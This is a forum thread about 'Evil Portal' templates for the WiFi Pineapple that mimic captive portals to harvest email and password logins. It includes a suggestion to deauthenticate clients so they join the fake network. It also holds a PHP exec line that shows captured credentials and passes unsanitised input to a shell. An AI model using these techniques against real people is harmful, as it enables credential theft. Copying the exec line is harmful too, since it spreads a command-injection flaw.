Evil Portals

kleo

Evil Portals

A collection of portals that can be loaded into the Evil Portal module and can be used to capture credentials.

Usage and more;

https://github.com/kbeflo/evilportals/

I'd be happy to hear about issues, and suggestions. Feel free to ask anything, contribute new templates, and improve the project.

Edited by kbeflo
  • Like 5
  • Upvote 9

• 3 weeks later...

Hi!

Good job man! Do you know Wifiphiser? They have good template too. https://github.com/sophron/wifiphisher

Do you know how we can build a template like this for TETRA/NANO?

I think we can make an attack with wlan1 to deauth and force a client to connect on wlan0 with this portal

https://wifiphisher.org/ps/wifi_connect/

or

https://wifiphisher.org/ps/firmware-upgrade

I w'll try to make it. If you can give me a hand, you're welcome.

Hi  kbeflo, I tried the templates and like them. pretty realistic!

I tweaked mine to work with tetra easy enough by changing the 3x /sd/ references to /root/ in MyPortal.php.

While testing I got to thinking that some of these would be great if made as injection sets for portal auth in /pineapple/modules/PortalAuth/includes/scripts/injects allowing them to be inserted into cloned pages. Just an idea tho

Thanks for the templates!

Edited by Just_a_User

7 hours ago, Just_a_User said:

Hi  kbeflo, I tried the templates and like them. pretty realistic!

I tweaked mine to work with tetra easy enough by changing the 3x /sd/ references to /root/ in MyPortal.php.

While testing I got to thinking that some of these would be great if made as injection sets for portal auth in /pineapple/modules/PortalAuth/includes/scripts/injects allowing them to be inserted into cloned pages. Just an idea tho

Thanks for the templates!

I have tried them on the tetra and they worked just fine for me without editing anything.

• Upvote 1

12 minutes ago, b0N3z said:

I have tried them on the tetra and they worked just fine for me without editing anything.

your right, they worked for me - but didn’t make the log with email/passwords - or at least I couldn’t find the log without modification to root location.

Edited by Just_a_User

Hmm this sounds familiar.  I just reset mine yesterday and reinstalled everything after testing the mana toolkit.  I wanna say I did the same with the logs the first time I set it up.  Ill have to take a look at it later.

Edit: You are correct.  I had them working yesterday but never input any info so never checked the log.  After going over some of the files it seems that they do write the logs to sd and no instructions for just the tetra.  Simple fix once you find it thought.

Edited by b0N3z

13 minutes ago, kbeflo said:

I assumed the Tetra would come with a sdcard storage. A little tweak should do it. Suggest on what directory logs will go on the Tetra?

I went for root (/root/evilportal-logs/) directory as I wanted to avoid tmp directory and wanted easy access once ssh'd in from mobile.

Edited by Just_a_User
  • Like 1

Hi all. 

Great job @kbeflo

I have a suggestion for your captive portal templates. 

I am using it for a while and it is great! 

After searching for a while I found that you can put notifications at the Dashboard notifications tile by using the command 

pineapple notify [text]

so what I did, I edit the MyPortal.php from these templates and I add the following code 

exec("pineapple notify $email'-'$pwd");

after the line 18 before the "}"

the results are showing bellow at the screenshot! 

Let me know about your thoughts! 

Screen Shot 2017-03-03 at 15.19.52.png

Edited by stilia.johny
  • Upvote 2

@stilia.johny this is great, to be able to see notifications from the web interface, thanks! I will include this to the project.

As I'm trying to fix the tetra saving logs to /root/ep, discovered a problem which is the templates is vulnerable to file path traversal, read more about it here

Edited by kbeflo

well lately EP has been hit and miss.  Yesterday my tetra would load the Portals and today it wont. hmm

4 hours ago, b0N3z said:

well lately EP has been hit and miss.  Yesterday my tetra would load the Portals and today it wont. hmm

I found I helpful when I restart the Ngnix Server 

You could do it by accessing it via SSH and give the command bellow 

/etc/init.d/ngnix restart 

This is the solution that I came across with.

Bare in mind @kbeflo is right, it will need internet to work. 

However I fond that you could enable the landing page with similar code as the captive portal and it will work just fine! ( you won't be able to do portal authorisations though! ) 

• 3 weeks later...

Here there is there anyway to add more options like firstname kinda thing iv been trying to do this but i get a webpage canot be found when hitting the submit button.

On 3/4/2017 at 8:18 AM, stilia.johny said:

it will need internet to work. 

Found a workaround on this,

On the networking tab I connected wlan2 to a prepaid wireless 3G hotspot. 

I have no credits loaded nor internet access, but it does make the Pineapple redirect to the Evil Portal.

Not a very reliable solution, but still you can do this while still being mobile.

1 hour ago, kbeflo said:

Found a workaround on this,

On the networking tab I connected wlan2 to a prepaid wireless 3G hotspot. 

I have no credits loaded nor internet access, but it does make the Pineapple redirect to the Evil Portal.

Not a very reliable solution, but still you can do this while still being mobile.

what I thought I had working for EP without internet was not what I thought it was.  On the other hand Im looking into what headers the pineapple request for internet and making a server to make the pineapple think it has internet.  I just thought of this today for some reason and havent done much research so I dont know if this is possible but im willing to find out and try.

On 31/03/2017 at 9:11 PM, b0N3z said:

what I thought I had working for EP without internet was not what I thought it was.  On the other hand Im looking into what headers the pineapple request for internet and making a server to make the pineapple think it has internet.  I just thought of this today for some reason and havent done much research so I dont know if this is possible but im willing to find out and try.

funny you say that - yesterday I had an idea of using a dns blackhole and @kbeflo found this

https://doc.pfsense.org/index.php/Creating_a_DNS_Black_Hole_for_Captive_Portal_Clients#Create_the_configuration_file

It looks promising. but is untested yet.

EDIT - as it stands wont work. :(

Edited by Just_a_User
  • Upvote 1

I found a couple post where people put freebsd on raspipi and pi zero so this might be a mobile option if it works.  I wont be able to really dive into it until later this weekend with work and kids.